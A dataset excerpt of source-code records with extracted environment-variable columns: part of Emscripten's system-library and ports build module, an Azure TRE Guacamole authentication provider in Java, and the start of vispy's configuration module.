'pthread_spin_init.c', 'pthread_attr_init.c', 'pthread_cond_destroy.c',
'pthread_mutex_timedlock.c', 'pthread_spin_lock.c',
'pthread_attr_setdetachstate.c', 'pthread_cond_init.c',
'pthread_mutex_trylock.c', 'pthread_spin_trylock.c',
'pthread_attr_setguardsize.c', 'pthread_cond_signal.c',
'pthread_mutex_unlock.c', 'pthread_spin_unlock.c',
'pthread_attr_setinheritsched.c', 'pthread_cond_timedwait.c',
'pthread_once.c', 'sem_destroy.c', 'pthread_attr_setschedparam.c',
'pthread_cond_wait.c', 'pthread_rwlockattr_destroy.c', 'sem_getvalue.c',
'pthread_attr_setschedpolicy.c', 'pthread_equal.c', 'pthread_rwlockattr_init.c',
'sem_init.c', 'pthread_attr_setscope.c', 'pthread_getspecific.c',
'pthread_rwlockattr_setpshared.c', 'sem_open.c', 'pthread_attr_setstack.c',
'pthread_key_create.c', 'pthread_rwlock_destroy.c', 'sem_post.c',
'pthread_attr_setstacksize.c', 'pthread_mutexattr_destroy.c',
'pthread_rwlock_init.c', 'sem_timedwait.c', 'pthread_barrierattr_destroy.c',
'pthread_mutexattr_init.c', 'pthread_rwlock_rdlock.c', 'sem_trywait.c',
'pthread_barrierattr_init.c', 'pthread_mutexattr_setprotocol.c',
'pthread_rwlock_timedrdlock.c', 'sem_unlink.c',
'pthread_barrierattr_setpshared.c', 'pthread_mutexattr_setpshared.c',
'pthread_rwlock_timedwrlock.c', 'sem_wait.c', 'pthread_barrier_destroy.c',
'pthread_mutexattr_setrobust.c', 'pthread_rwlock_tryrdlock.c',
'__timedwait.c', 'pthread_barrier_init.c', 'pthread_mutexattr_settype.c',
'pthread_rwlock_trywrlock.c', 'vmlock.c', 'pthread_barrier_wait.c',
'pthread_mutex_consistent.c', 'pthread_rwlock_unlock.c', '__wait.c',
'pthread_condattr_destroy.c', 'pthread_mutex_destroy.c',
'pthread_rwlock_wrlock.c', 'pthread_condattr_init.c',
'pthread_mutex_getprioceiling.c', 'pthread_setcanceltype.c',
'pthread_condattr_setclock.c', 'pthread_mutex_init.c',
'pthread_setspecific.c', 'pthread_setcancelstate.c'
])
files += [shared.path_from_root('system', 'lib', 'pthread', 'library_pthread.c')]
if shared.Settings.WASM_BACKEND:
files += [shared.path_from_root('system', 'lib', 'pthread', 'library_pthread_wasm.c')]
else:
files += [shared.path_from_root('system', 'lib', 'pthread', 'library_pthread_asmjs.c')]
return files
else:
return [shared.path_from_root('system', 'lib', 'pthread', 'library_pthread_stub.c')]
def get_base_name_prefix(self):
return 'libpthread' if self.is_mt else 'libpthread_stub'
class CompilerRTWasmLibrary(Library):
cflags = ['-O2', '-fno-builtin']
# compiler_rt files can't currently be part of LTO although we are hoping to remove this
# restriction soon: https://reviews.llvm.org/D71738
force_object_files = True
def can_build(self):
return super(CompilerRTWasmLibrary, self).can_build() and shared.Settings.WASM_BACKEND
class libc_rt_wasm(AsanInstrumentedLibrary, CompilerRTWasmLibrary, MuslInternalLibrary):
name = 'libc_rt_wasm'
def get_files(self):
return get_wasm_libc_rt_files()
class libubsan_minimal_rt_wasm(CompilerRTWasmLibrary, MTLibrary):
name = 'libubsan_minimal_rt_wasm'
never_force = True
includes = [['system', 'lib', 'compiler-rt', 'lib']]
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'ubsan_minimal']
src_files = ['ubsan_minimal_handlers.cpp']
class libsanitizer_common_rt_wasm(CompilerRTWasmLibrary, MTLibrary):
name = 'libsanitizer_common_rt_wasm'
depends = ['libc++abi']
includes = [['system', 'lib', 'libc', 'musl', 'src', 'internal']]
js_depends = ['memalign', 'emscripten_builtin_memalign', '__data_end', '__heap_base']
never_force = True
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'sanitizer_common']
src_glob = '*.cc'
src_glob_exclude = ['sanitizer_common_nolibc.cc']
class SanitizerLibrary(CompilerRTWasmLibrary, MTLibrary):
depends = ['libsanitizer_common_rt_wasm']
never_force = True
includes = [['system', 'lib', 'compiler-rt', 'lib']]
src_glob = '*.cc'
class libubsan_rt_wasm(SanitizerLibrary):
name = 'libubsan_rt_wasm'
js_depends = ['emscripten_builtin_malloc', 'emscripten_builtin_free']
cflags = ['-DUBSAN_CAN_USE_CXXABI']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'ubsan']
class liblsan_common_rt_wasm(SanitizerLibrary):
name = 'liblsan_common_rt_wasm'
js_depends = ['__global_base']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'lsan']
src_glob = 'lsan_common*.cc'
class liblsan_rt_wasm(SanitizerLibrary):
name = 'liblsan_rt_wasm'
depends = ['liblsan_common_rt_wasm']
js_depends = ['emscripten_builtin_malloc', 'emscripten_builtin_free']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'lsan']
src_glob_exclude = ['lsan_common.cc', 'lsan_common_mac.cc', 'lsan_common_linux.cc',
'lsan_common_emscripten.cc']
class libasan_rt_wasm(SanitizerLibrary):
name = 'libasan_rt_wasm'
depends = ['liblsan_common_rt_wasm', 'libubsan_rt_wasm']
src_dir = ['system', 'lib', 'compiler-rt', 'lib', 'asan']
# This library is used when STANDALONE_WASM is set. In that mode, we don't
# want to depend on JS, and so this library contains implementations of
# things that we'd normally do in JS. That includes some general things
# as well as some additional musl components (that normally we reimplement
# in JS as it's more efficient that way).
class libstandalonewasm(MuslInternalLibrary):
name = 'libstandalonewasm'
cflags = ['-Os']
src_dir = ['system', 'lib']
def __init__(self, **kwargs):
self.is_mem_grow = kwargs.pop('is_mem_grow')
super(libstandalonewasm, self).__init__(**kwargs)
def get_base_name(self):
name = super(libstandalonewasm, self).get_base_name()
if self.is_mem_grow:
name += '-memgrow'
return name
def get_cflags(self):
cflags = super(libstandalonewasm, self).get_cflags()
cflags += ['-DNDEBUG']
if self.is_mem_grow:
cflags += ['-D__EMSCRIPTEN_MEMORY_GROWTH__=1']
return cflags
@classmethod
def vary_on(cls):
return super(libstandalonewasm, cls).vary_on() + ['is_mem_grow']
@classmethod
def get_default_variation(cls, **kwargs):
return super(libstandalonewasm, cls).get_default_variation(
is_mem_grow=shared.Settings.ALLOW_MEMORY_GROWTH,
**kwargs
)
def get_files(self):
base_files = files_in_path(
path_components=['system', 'lib'],
filenames=['standalone_wasm.c'])
# It is more efficient to use JS methods for time, normally.
time_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'time'],
filenames=['strftime.c',
'__month_to_secs.c',
'__tm_to_secs.c',
'__tz.c',
'__year_to_secs.c',
'gettimeofday.c',
'localtime.c',
'localtime_r.c',
'gmtime.c',
'gmtime_r.c',
'nanosleep.c',
'mktime.c'])
# It is more efficient to use JS for __assert_fail, as it avoids always
# including fprintf etc.
exit_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'exit'],
filenames=['assert.c'])
conf_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'conf'],
filenames=['sysconf.c'])
return base_files + time_files + exit_files + conf_files
def can_build(self):
return super(libstandalonewasm, self).can_build() and shared.Settings.WASM_BACKEND
# If main() is not in EXPORTED_FUNCTIONS, it may be dce'd out. This can be
# confusing, so issue a warning.
def warn_on_unexported_main(symbolses):
if '_main' not in shared.Settings.EXPORTED_FUNCTIONS:
for symbols in symbolses:
if 'main' in symbols.defs:
logger.warning('main() is in the input files, but "_main" is not in EXPORTED_FUNCTIONS, which means it may be eliminated as dead code. Export it if you want main() to run.')
return
def calculate(temp_files, in_temp, stdout_, stderr_, forced=[]):
global stdout, stderr
stdout = stdout_
stderr = stderr_
# Set of libraries to include on the link line, as opposed to `force` which
# is the set of libraries to force include (with --whole-archive).
always_include = set()
# Setting this will only use the forced libs in EMCC_FORCE_STDLIBS. This avoids spending time checking
# for unresolved symbols in your project files, which can speed up linking, but if you do not have
# the proper list of actually needed libraries, errors can occur. See below for how we must
# export all the symbols in deps_info when using this option.
only_forced = os.environ.get('EMCC_ONLY_FORCED_STDLIBS')
if only_forced:
temp_files = []
# Add in some hacks for js libraries. If a js lib depends on a symbol provided by a C library, it must be
# added to here, because our deps go only one way (each library here is checked, then we check the next
# in order - libc++, libcxextra, etc. - and then we run the JS compiler and provide extra symbols from
# library*.js files. But we cannot then go back to the C libraries if a new dep was added!
# TODO: Move all __deps from src/library*.js to deps_info.json, and use that single source of info
# both here and in the JS compiler.
deps_info = json.loads(open(shared.path_from_root('src', 'deps_info.json')).read())
added = set()
def add_back_deps(need):
more = False
for ident, deps in deps_info.items():
if ident in need.undefs and ident not in added:
added.add(ident)
more = True
for dep in deps:
# certain symbols in deps_info.json don't exist in the wasm backend
if shared.Settings.WASM_BACKEND and dep in ['_get_environ']:
continue
need.undefs.add(dep)
if shared.Settings.VERBOSE:
logger.debug('adding dependency on %s due to deps-info on %s' % (dep, ident))
shared.Settings.EXPORTED_FUNCTIONS.append(mangle_c_symbol_name(dep))
if more:
add_back_deps(need) # recurse to get deps of deps
# Scan symbols
symbolses = shared.Building.parallel_llvm_nm([os.path.abspath(t) for t in temp_files])
warn_on_unexported_main(symbolses)
if len(symbolses) == 0:
class Dummy(object):
defs = set()
undefs = set()
symbolses.append(Dummy())
# depend on exported functions
for export in shared.Settings.EXPORTED_FUNCTIONS:
if shared.Settings.VERBOSE:
logger.debug('adding dependency on export %s' % export)
symbolses[0].undefs.add(demangle_c_symbol_name(export))
for symbols in symbolses:
add_back_deps(symbols)
# If we are only doing forced stdlibs, then we don't know the actual symbols we need,
# and must assume all of deps_info must be exported. Note that this might cause
# warnings on exports that do not exist.
if only_forced:
for key, value in deps_info.items():
for dep in value:
shared.Settings.EXPORTED_FUNCTIONS.append(mangle_c_symbol_name(dep))
always_include.add('libpthread')
if shared.Settings.MALLOC != 'none':
always_include.add('libmalloc')
if shared.Settings.WASM_BACKEND:
always_include.add('libcompiler_rt')
libs_to_link = []
already_included = set()
system_libs_map = Library.get_usable_variations()
system_libs = sorted(system_libs_map.values(), key=lambda lib: lib.name)
# Setting this in the environment will avoid checking dependencies and make
# building big projects a little faster 1 means include everything; otherwise
# it can be the name of a lib (libc++, etc.).
# You can provide 1 to include everything, or a comma-separated list with the
# ones you want
force = os.environ.get('EMCC_FORCE_STDLIBS')
if force == '1':
force = ','.join(name for name, lib in system_libs_map.items() if not lib.never_force)
force_include = set((force.split(',') if force else []) + forced)
if force_include:
logger.debug('forcing stdlibs: ' + str(force_include))
for lib in always_include:
assert lib in system_libs_map
for lib in force_include:
if lib not in system_libs_map:
shared.exit_with_error('invalid forced library: %s', lib)
def add_library(lib):
if lib.name in already_included:
return
already_included.add(lib.name)
logger.debug('including %s (%s)' % (lib.name, lib.get_filename()))
need_whole_archive = lib.name in force_include and lib.get_ext() == '.a'
libs_to_link.append((lib.get_path(), need_whole_archive))
# Recursively add dependencies
for d in lib.get_depends():
add_library(system_libs_map[d])
for d in lib.js_depends:
d = '_' + d
if d not in shared.Settings.EXPORTED_FUNCTIONS:
shared.Settings.EXPORTED_FUNCTIONS.append(d)
if shared.Settings.STANDALONE_WASM:
add_library(system_libs_map['crt1'])
# Go over libraries to figure out which we must include
for lib in system_libs:
if lib.name in already_included:
continue
force_this = lib.name in force_include
if not force_this and only_forced:
continue
include_this = force_this or lib.name in always_include
if not include_this:
need_syms = set()
has_syms = set()
for symbols in symbolses:
if shared.Settings.VERBOSE:
logger.debug('undefs: ' + str(symbols.undefs))
for library_symbol in lib.symbols:
if library_symbol in symbols.undefs:
need_syms.add(library_symbol)
if library_symbol in symbols.defs:
has_syms.add(library_symbol)
for haz in has_syms:
if haz in need_syms:
# remove symbols that are supplied by another of the inputs
need_syms.remove(haz)
if shared.Settings.VERBOSE:
logger.debug('considering %s: we need %s and have %s' % (lib.name, str(need_syms), str(has_syms)))
if not len(need_syms):
continue
# We need to build and link the library in
add_library(lib)
if shared.Settings.WASM_BACKEND:
add_library(system_libs_map['libc_rt_wasm'])
if shared.Settings.UBSAN_RUNTIME == 1:
add_library(system_libs_map['libubsan_minimal_rt_wasm'])
elif shared.Settings.UBSAN_RUNTIME == 2:
add_library(system_libs_map['libubsan_rt_wasm'])
if shared.Settings.USE_LSAN:
force_include.add('liblsan_rt_wasm')
add_library(system_libs_map['liblsan_rt_wasm'])
if shared.Settings.USE_ASAN:
force_include.add('libasan_rt_wasm')
add_library(system_libs_map['libasan_rt_wasm'])
# the sanitizer runtimes may call mmap, which will need a few things. sadly
# the usual deps_info mechanism does not work since we scan only user files
# for things, and not libraries (to be able to scan libraries, we'd need to
# somehow figure out which of their object files will actually be linked in -
# but only lld knows that). so just directly handle that here.
if shared.Settings.UBSAN_RUNTIME or shared.Settings.USE_LSAN or shared.Settings.USE_ASAN:
shared.Settings.EXPORTED_FUNCTIONS.append(mangle_c_symbol_name('memset'))
if shared.Settings.STANDALONE_WASM:
add_library(system_libs_map['libstandalonewasm'])
if shared.Settings.PROXY_POSIX_SOCKETS:
add_library(system_libs_map['libsockets_proxy'])
else:
add_library(system_libs_map['libsockets'])
libs_to_link.sort(key=lambda x: x[0].endswith('.a')) # make sure to put .a files at the end.
# libc++abi and libc++ *static* linking is tricky. e.g. cxa_demangle.cpp disables c++
# exceptions, but since the string methods in the headers are *weakly* linked, then
# we might have exception-supporting versions of them from elsewhere, and if libc++abi
# is first then it would "win", breaking exception throwing from those string
# header methods. To avoid that, we link libc++abi last.
libs_to_link.sort(key=lambda x: x[0].endswith('libc++abi.bc'))
# Wrap libraries in --whole-archive, as needed. We need to do this last
# since otherwise the abort sorting won't make sense.
ret = []
in_group = False
for name, need_whole_archive in libs_to_link:
if need_whole_archive and not in_group:
ret.append('--whole-archive')
in_group = True
if in_group and not need_whole_archive:
ret.append('--no-whole-archive')
in_group = False
ret.append(name)
if in_group:
ret.append('--no-whole-archive')
return ret
class Ports(object):
"""emscripten-ports library management (https://github.com/emscripten-ports).
"""
@staticmethod
def get_lib_name(name):
return name + static_library_ext()
@staticmethod
def get_include_dir():
dirname = shared.Cache.get_path('include')
shared.safe_ensure_dirs(dirname)
return dirname
@staticmethod
def install_header_dir(src_dir, target=None):
if not target:
target = os.path.basename(src_dir)
dest = os.path.join(Ports.get_include_dir(), target)
shared.try_delete(dest)
logger.debug('installing headers: ' + dest)
shutil.copytree(src_dir, dest)
@staticmethod
def install_headers(src_dir, pattern="*.h", target=None):
logger.debug("install_headers")
dest = Ports.get_include_dir()
if target:
dest = os.path.join(dest, target)
shared.safe_ensure_dirs(dest)
matches = glob.glob(os.path.join(src_dir, pattern))
assert matches, "no headers found to install in %s" % src_dir
for f in matches:
logger.debug('installing: ' + os.path.join(dest, os.path.basename(f)))
shutil.copyfile(f, os.path.join(dest, os.path.basename(f)))
@staticmethod
def build_port(src_path, output_path, includes=[], flags=[], exclude_files=[], exclude_dirs=[]):
srcs = []
for root, dirs, files in os.walk(src_path, topdown=False):
if any((excluded in root) for excluded in exclude_dirs):
continue
for f in files:
ext = os.path.splitext(f)[1]
if ext in ('.c', '.cpp') and not any((excluded in f) for excluded in exclude_files):
srcs.append(os.path.join(root, f))
include_commands = ['-I' + src_path]
for include in includes:
include_commands.append('-I' + include)
commands = []
objects = []
for src in srcs:
obj = src + '.o'
commands.append([shared.PYTHON, shared.EMCC, '-c', src, '-O2', '-o', obj, '-w'] + include_commands + flags)
objects.append(obj)
Ports.run_commands(commands)
create_lib(output_path, objects)
return output_path
@staticmethod
def run_commands(commands):
# Runs a sequence of compiler commands, adding importand cflags as defined by get_cflags() so
# that the ports are built in the correct configuration.
def add_args(cmd):
# this must only be called on a standard build command
assert cmd[0] == shared.PYTHON and cmd[1] in (shared.EMCC, shared.EMXX)
# add standard cflags, but also allow the cmd to override them
return cmd[:2] + get_cflags() + cmd[2:]
run_build_commands([add_args(c) for c in commands])
@staticmethod
def create_lib(libname, inputs): # make easily available for port objects
create_lib(libname, inputs)
@staticmethod
def get_dir():
dirname = os.environ.get('EM_PORTS') or os.path.expanduser(os.path.join('~', '.emscripten_ports'))
shared.safe_ensure_dirs(dirname)
return dirname
@staticmethod
def erase():
dirname = Ports.get_dir()
shared.try_delete(dirname)
if os.path.exists(dirname):
logger.warning('could not delete ports dir %s - try to delete it manually' % dirname)
@staticmethod
def get_build_dir():
return shared.Cache.get_path('ports-builds')
name_cache = set()
@staticmethod
def fetch_project(name, url, subdir, is_tarbz2=False, sha512hash=None):
# To compute the sha512 hash, run `curl URL | sha512sum`.
fullname = os.path.join(Ports.get_dir(), name)
# EMCC_LOCAL_PORTS: A hacky way to use a local directory for a port. This
# is not tested but can be useful for debugging
# changes to a port.
#
# if EMCC_LOCAL_PORTS is set, we use a local directory as our ports. This is useful
# for testing. This env var should be in format
# name=dir,name=dir
# e.g.
# sdl2=/home/username/dev/ports/SDL2
# so you could run
# EMCC_LOCAL_PORTS="sdl2=/home/alon/Dev/ports/SDL2" ./tests/runner.py browser.test_sdl2_mouse
# this will simply copy that directory into the ports directory for sdl2, and use that. It also
# clears the build, so that it is rebuilt from that source.
local_ports = os.environ.get('EMCC_LOCAL_PORTS')
if local_ports:
shared.Cache.acquire_cache_lock()
logger.warning('using local ports: %s' % local_ports)
local_ports = [pair.split('=', 1) for pair in local_ports.split(',')]
try:
for local in local_ports:
if name == local[0]:
path = local[1]
if name not in ports.ports_by_name:
shared.exit_with_error('%s is not a known port' % name)
port = ports.ports_by_name[name]
if not hasattr(port, 'SUBDIR'):
logger.error('port %s lacks .SUBDIR attribute, which we need in order to override it locally, please update it' % name)
sys.exit(1)
subdir = port.SUBDIR
target = os.path.join(fullname, subdir)
if os.path.exists(target) and not dir_is_newer(path, target):
logger.warning('not grabbing local port: ' + name + ' from ' + path + ' to ' + fullname + ' (subdir: ' + subdir + ') as the destination ' + target + ' is newer (run emcc --clear-ports if that is incorrect)')
else:
logger.warning('grabbing local port: ' + name + ' from ' + path + ' to ' + fullname + ' (subdir: ' + subdir + ')')
shared.try_delete(fullname)
shutil.copytree(path, target)
Ports.clear_project_build(name)
return
finally:
shared.Cache.release_cache_lock()
if is_tarbz2:
fullpath = fullname + '.tar.bz2'
elif url.endswith('.tar.gz'):
fullpath = fullname + '.tar.gz'
else:
fullpath = fullname + '.zip'
if name not in Ports.name_cache: # only mention each port once in log
logger.debug('including port: ' + name)
logger.debug(' (at ' + fullname + ')')
Ports.name_cache.add(name)
class State(object):
retrieved = False
unpacked = False
def retrieve():
# retrieve from remote server
logger.info('retrieving port: ' + name + ' from ' + url)
try:
import requests
response = requests.get(url)
data = response.content
except ImportError:
try:
from urllib.request import urlopen
f = urlopen(url)
data = f.read()
except ImportError:
# Python 2 compatibility
from urllib2 import urlopen
f = urlopen(url)
data = f.read()
if sha512hash:
actual_hash = hashlib.sha512(data).hexdigest()
if actual_hash != sha512hash:
raise RuntimeError('Unexpected hash: ' + actual_hash + '\n'
'If you are updating the port, please update the hash in the port module.')
open(fullpath, 'wb').write(data)
State.retrieved = True
def check_tag():
if is_tarbz2:
names = tarfile.open(fullpath, 'r:bz2').getnames()
elif url.endswith('.tar.gz'):
names = tarfile.open(fullpath, 'r:gz').getnames()
else:
names = zipfile.ZipFile(fullpath, 'r').namelist()
# check if first entry of the archive is prefixed with the same
# tag as we need so no longer download and recompile if so
return bool(re.match(subdir + r'(\\|/|$)', names[0]))
def unpack():
logger.info('unpacking port: ' + name)
shared.safe_ensure_dirs(fullname)
# TODO: Someday when we are using Python 3, we might want to change the
# code below to use shlib.unpack_archive
# e.g.: shutil.unpack_archive(filename=fullpath, extract_dir=fullname)
# (https://docs.python.org/3/library/shutil.html#shutil.unpack_archive)
if is_tarbz2:
z = tarfile.open(fullpath, 'r:bz2')
elif url.endswith('.tar.gz'):
z = tarfile.open(fullpath, 'r:gz')
else:
z = zipfile.ZipFile(fullpath, 'r')
try:
cwd = os.getcwd()
os.chdir(fullname)
z.extractall()
finally:
os.chdir(cwd)
State.unpacked = True
# main logic. do this under a cache lock, since we don't want multiple jobs to
# retrieve the same port at once
shared.Cache.acquire_cache_lock()
try:
if not os.path.exists(fullpath):
retrieve()
if not os.path.exists(fullname):
unpack()
if not check_tag():
logger.warning('local copy of port is not correct, retrieving from remote server')
shared.try_delete(fullname)
shared.try_delete(fullpath)
retrieve()
unpack()
if State.unpacked:
# we unpacked a new version, clear the build in the cache
Ports.clear_project_build(name)
finally:
shared.Cache.release_cache_lock()
@staticmethod
def clear_project_build(name):
port = ports.ports_by_name[name]
port.clear(Ports, shared)
shared.try_delete(os.path.join(Ports.get_build_dir(), name))
# get all ports
def get_ports(settings):
ret = []
try:
process_dependencies(settings)
for port in ports.ports:
# ports return their output files, which will be linked, or a txt file
ret += [f for f in port.get(Ports, settings, shared) if not f.endswith('.txt')]
except Exception:
logger.error('a problem occurred when using an emscripten-ports library. try to run `emcc --clear-ports` and then run this command again')
raise
ret.reverse()
return ret
def process_dependencies(settings):
for port in reversed(ports.ports):
if hasattr(port, "process_dependencies"):
port.process_dependencies(settings)
def process_args(args, settings):
process_dependencies(settings)
for port in ports.ports:
args = port.process_args(Ports, args, settings, shared)
return args
# get a single port
def get_port(name, settings):
port = ports.ports_by_name[name]
if hasattr(port, "process_dependencies"):
port.process_dependencies(settings)
# ports return their output files, which will be linked, or a txt file
return [f for f in port.get(Ports, settings, shared) if not f.endswith('.txt')]
def show_ports():
print('Available ports:')
for port in ports.ports:
print(' ', port.show())
|
[] |
[] |
[
"EMCC_ONLY_FORCED_STDLIBS",
"EMCC_LOCAL_PORTS",
"EMCC_FORCE_STDLIBS",
"EM_PORTS"
] |
[]
|
["EMCC_ONLY_FORCED_STDLIBS", "EMCC_LOCAL_PORTS", "EMCC_FORCE_STDLIBS", "EM_PORTS"]
|
python
| 4 | 0 | |
templates/workspace_services/guacamole/guacamole-server/guacamole-auth-azure/src/main/java/org/apache/guacamole/auth/azuretre/AzureTREAuthenticationProvider.java
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.guacamole.auth.azuretre;
import com.auth0.jwk.UrlJwkProvider;
import com.google.common.base.Strings;
import org.apache.guacamole.GuacamoleException;
import org.apache.guacamole.auth.azuretre.connection.ConnectionService;
import org.apache.guacamole.auth.azuretre.user.AzureTREAuthenticatedUser;
import org.apache.guacamole.auth.azuretre.user.TreUserContext;
import org.apache.guacamole.net.auth.AbstractAuthenticationProvider;
import org.apache.guacamole.net.auth.AuthenticatedUser;
import org.apache.guacamole.net.auth.Credentials;
import org.apache.guacamole.net.auth.UserContext;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.net.URL;
public class AzureTREAuthenticationProvider extends AbstractAuthenticationProvider {
public static final String ROOT_CONNECTION_GROUP = "ROOT";
private static final Logger LOGGER = LoggerFactory.getLogger(AzureTREAuthenticationProvider.class);
private final AuthenticationProviderService authenticationProviderService;
public AzureTREAuthenticationProvider() {
this.authenticationProviderService = new AuthenticationProviderService();
}
public AzureTREAuthenticationProvider(
AuthenticationProviderService authenticationProviderService) {
if (authenticationProviderService == null) {
this.authenticationProviderService = new AuthenticationProviderService();
} else {
this.authenticationProviderService = authenticationProviderService;
}
}
@Override
public String getIdentifier() {
return "azuretre";
}
@Override
public AuthenticatedUser updateAuthenticatedUser(AuthenticatedUser authenticatedUser, Credentials credentials)
throws GuacamoleException {
LOGGER.info("updateAuthenticatedUser");
AuthenticatedUser updated = authenticateUser(credentials);
LOGGER.info("updateAuthenticatedUser - done");
return updated;
}
@Override
public AzureTREAuthenticatedUser authenticateUser(final Credentials credentials) {
LOGGER.info("Authenticating user");
// Getting headers from the oauth2 proxy
final String accessToken = credentials.getRequest().getHeader("X-Forwarded-Access-Token");
final String prefEmail = credentials.getRequest().getHeader("X-Forwarded-Email");
if (Strings.isNullOrEmpty(accessToken)) {
LOGGER.error("access token was not provided");
return null;
}
if (Strings.isNullOrEmpty(prefEmail)) {
LOGGER.error("email was not provided");
return null;
}
return new AzureTREAuthenticatedUser(credentials, accessToken, prefEmail, null, this);
}
@Override
public UserContext getUserContext(final AuthenticatedUser authenticatedUser) throws GuacamoleException {
LOGGER.debug("Getting user context.");
if (authenticatedUser instanceof AzureTREAuthenticatedUser) {
final AzureTREAuthenticatedUser user = (AzureTREAuthenticatedUser) authenticatedUser;
final String accessToken = user.getAccessToken();
LOGGER.debug("Getting configurations in order to populate user context.");
var connections = ConnectionService.getConnections(user);
LOGGER.debug("Creating user context.");
final TreUserContext treUserContext = new TreUserContext(this, connections);
treUserContext.init(user);
// Validate the token 'again', the OpenID extension verified it, but it didn't verify
// that we got the correct roles. The fact that a valid token was returned doesn't mean
// this user is an Owner or a Researcher. If its not, break, don't try to get any VMs.
// Note: At the moment there is NO apparent way to UN-Authorize a user that a previous
// extension authorized... (The user will see an empty list of VMs)
// Note2: The API app will also verify the token an in any case will not return any vms
// in this case.
try {
LOGGER.info("Validating token");
final UrlJwkProvider jwkProvider =
new UrlJwkProvider(new URL(System.getenv("OAUTH2_PROXY_JWKS_ENDPOINT")));
authenticationProviderService.validateToken(accessToken, jwkProvider);
} catch (final Exception ex) {
// Failed to validate the token
LOGGER.error("Failed to validate token. ex: " + ex);
return null;
}
return treUserContext;
}
return null;
}
@Override
public UserContext updateUserContext(UserContext context, AuthenticatedUser authenticatedUser,
Credentials credentials)
throws GuacamoleException {
LOGGER.debug("Updating usercontext");
var userContext = getUserContext(authenticatedUser);
return userContext;
}
}
|
[
"\"OAUTH2_PROXY_JWKS_ENDPOINT\""
] |
[] |
[
"OAUTH2_PROXY_JWKS_ENDPOINT"
] |
[]
|
["OAUTH2_PROXY_JWKS_ENDPOINT"]
|
java
| 1 | 0 | |
vispy/util/config.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
"""Vispy configuration functions
"""
import os
from os import path as op
import json
import sys
import platform
import getopt
import traceback
import tempfile
import atexit
from shutil import rmtree
from .event import EmitterGroup, EventEmitter, Event
from .logs import logger, set_log_level, use_log_level
from ..ext.six import string_types, file_types
config = None
_data_path = None
_allowed_config_keys = None
def _init():
""" Create global Config object, parse command flags
"""
global config, _data_path, _allowed_config_keys
app_dir = _get_vispy_app_dir()
if app_dir is not None:
_data_path = op.join(app_dir, 'data')
_test_data_path = op.join(app_dir, 'test_data')
else:
_data_path = _test_data_path = None
# All allowed config keys and the types they may have
_allowed_config_keys = {
'data_path': string_types,
'default_backend': string_types,
'gl_backend': string_types,
'gl_debug': (bool,),
'glir_file': string_types+file_types,
'include_path': list,
'logging_level': string_types,
'qt_lib': string_types,
'dpi': (int, type(None)),
'profile': string_types + (type(None),),
'audit_tests': (bool,),
'test_data_path': string_types + (type(None),),
}
# Default values for all config options
default_config_options = {
'data_path': _data_path,
'default_backend': '',
'gl_backend': 'gl2',
'gl_debug': False,
'glir_file': '',
'include_path': [],
'logging_level': 'info',
'qt_lib': 'any',
'dpi': None,
'profile': None,
'audit_tests': False,
'test_data_path': _test_data_path,
}
config = Config(**default_config_options)
try:
config.update(**_load_config())
except Exception as err:
raise Exception('Error while reading vispy config file "%s":\n %s' %
(_get_config_fname(), err.message))
set_log_level(config['logging_level'])
_parse_command_line_arguments()
###############################################################################
# Command line flag parsing
VISPY_HELP = """
VisPy command line arguments:
--vispy-backend=(qt|pyqt4|pyt5|pyside|glfw|pyglet|sdl2|wx)
Selects the backend system for VisPy to use. This will override the default
backend selection in your configuration file.
--vispy-log=(debug|info|warning|error|critical)[,search string]
Sets the verbosity of logging output. The default is 'warning'. If a search
string is given, messages will only be displayed if they match the string,
or if their call location (module.class:method(line) or
module:function(line)) matches the string.
--vispy-dpi=resolution
Force the screen resolution to a certain value (in pixels per inch). By
default, the OS is queried to determine the screen DPI.
--vispy-fps
Print the framerate (in Frames Per Second) in the console.
--vispy-gl-debug
Enables error checking for all OpenGL calls.
--vispy-glir-file
Export glir commands to specified file.
--vispy-profile=locations
Measure performance at specific code locations and display results.
*locations* may be "all" or a comma-separated list of method names like
"SceneCanvas.draw_visual".
--vispy-cprofile
Enable profiling using the built-in cProfile module and display results
when the program exits.
--vispy-audit-tests
Enable user auditing of image test results.
--vispy-help
Display this help message.
"""
def _parse_command_line_arguments():
""" Transform vispy specific command line args to vispy config.
Put into a function so that any variables dont leak in the vispy namespace.
"""
global config
# Get command line args for vispy
argnames = ['vispy-backend=', 'vispy-gl-debug', 'vispy-glir-file=',
'vispy-log=', 'vispy-help', 'vispy-profile=', 'vispy-cprofile',
'vispy-dpi=', 'vispy-audit-tests']
try:
opts, args = getopt.getopt(sys.argv[1:], '', argnames)
except getopt.GetoptError:
opts = []
# Use them to set the config values
for o, a in opts:
if o.startswith('--vispy'):
if o == '--vispy-backend':
config['default_backend'] = a
logger.info('vispy backend: %s', a)
elif o == '--vispy-gl-debug':
config['gl_debug'] = True
elif o == '--vispy-glir-file':
config['glir_file'] = a
elif o == '--vispy-log':
if ',' in a:
verbose, match = a.split(',')
else:
verbose = a
match = None
config['logging_level'] = a
set_log_level(verbose, match)
elif o == '--vispy-profile':
config['profile'] = a
elif o == '--vispy-cprofile':
_enable_profiling()
elif o == '--vispy-help':
print(VISPY_HELP)
elif o == '--vispy-dpi':
config['dpi'] = int(a)
elif o == '--vispy-audit-tests':
config['audit_tests'] = True
else:
logger.warning("Unsupported vispy flag: %s" % o)
###############################################################################
# CONFIG
